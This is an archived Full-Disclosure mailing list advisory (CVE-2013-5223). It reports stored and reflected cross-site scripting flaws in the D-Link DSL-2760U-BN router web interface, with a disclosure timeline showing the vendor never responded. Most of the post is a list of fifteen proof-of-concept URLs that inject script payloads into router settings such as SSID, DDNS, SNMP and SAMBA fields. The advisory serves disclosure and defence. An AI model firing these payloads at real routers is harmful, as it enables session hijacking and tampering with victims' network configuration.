| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 10 Nov 2013 15:59:31 +0200
From: LIAD Mizrachi <liadmz@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: D-Link Router 2760N (DSL-2760U-BN) Multiple XSS
Advisory: D-Link Router 2760N (DSL-2760U-BN) Multiple XSS
Author: Liad Mizrachi
Vendor URL: http://www.dlink.com
Status: Not Fiexed
CVE-ID: CVE-2013-5223
==========================
Vulnerability Description
==========================
Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link
Router 2760N, both stored and reflected in various sections of the router
Web-UI.
==========================
PoC
==========================
1) NTS Settings
http://
<D_LINK_HOST>/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=
time-nw.nist.gov
&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=0
2) Dynamic DNS (Reflected/Stored)
http://
<D_LINK_HOST>/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0
3)Parental Control
http://
<D_LINK_HOST>/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732
4) URL Filtering
http://
<D_LINK_HOST>/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80
5) NAT - Port Triggering
http://
<D_LINK_HOST>/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,
6) IP Filtering:
http://
<D_LINK_HOST>/scoutflt.cmd?action=add&fltName=<script>alert('XSS')</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080
7) IP Filtering - Removal Error:
http://
<D_LINK_HOST>/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"):
http://
<D_LINK_HOST>/portmapcfg.cmd?action=add&groupName=<Script>alert('XSS')</script>&choiceBox=|usb0|wl0|&wanIfName=atm1
9) SNMP
http://
<D_LINK_HOST>/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.0
10) Incoming IP Filter:
http://
<D_LINK_HOST>/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert('XSS&protocol=2&srcAddr=SS')</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080
11) Policy Routing Add:
http://
<D_LINK_HOST>/prmngr.cmd?action=add&PolicyName=<script>alert('X&SourceIp=SS');</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111
12)Policy Routing -Removal Error:
http://
<D_LINK_HOST>/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
13) Printer Server
http://
<D_LINK_HOST>/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('XSS-Printer-Sever');//
14) SAMBA Configuration
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';var
x="XSS";//&smbDirName=b';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://
<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
15) WiFi SSID
Step 1 (Create XSS as Wireless SSID):
http://
<D_LINK_HOST>/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16
Step 2:
Goto the Wireless -> Security [http://<D_LINK_HOST>/wlsecurity.html]
OR
Goto the Wireless -> MAC Filter [http://
<D_LINK_HOST>/wlmacflt.cmd?action=view]
==========================
Disclosure Timeline
==========================
17-Aug-2013 - Vendor Informed - No response.
23-Aug-2013 - Vendor Re-Informed - No response.
01-Sep-2013 - Vendor Re-Informed - No response.
10-Sep-2013 - Vendor Re-Informed - No response.
10-Oct-2013 - Vendor Re-Informed - No response.
==========================
References
==========================
http://www.dlink.com
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf
Content of type "text/html" skipped
View attachment "DSL-2760U-BN-NTS-XSS.txt" of type "text/plain" (4585 bytes)
Download attachment "DHCP.png" of type "image/png" (80580 bytes)
Download attachment "DynamicDNS.png" of type "image/png" (100163 bytes)
Download attachment "InterfaceGrouping.png" of type "image/png" (66491 bytes)
Download attachment "IpFiltering_ErrMsg.png" of type "image/png" (62318 bytes)
Download attachment "NTS.png" of type "image/png" (76094 bytes)
Download attachment "ParentalControl.png" of type "image/png" (70457 bytes)
Download attachment "PolicyRoutingSetting.png" of type "image/png" (100724 bytes)
Download attachment "PortTriggering.png" of type "image/png" (117230 bytes)
Download attachment "PrinterSrv.png" of type "image/png" (98666 bytes)
Download attachment "SambaSrv.png" of type "image/png" (51544 bytes)
Download attachment "SambaSrv_2.png" of type "image/png" (51603 bytes)
Download attachment "SSID.png" of type "image/png" (130489 bytes)
Download attachment "URL_Filtering.png" of type "image/png" (82417 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists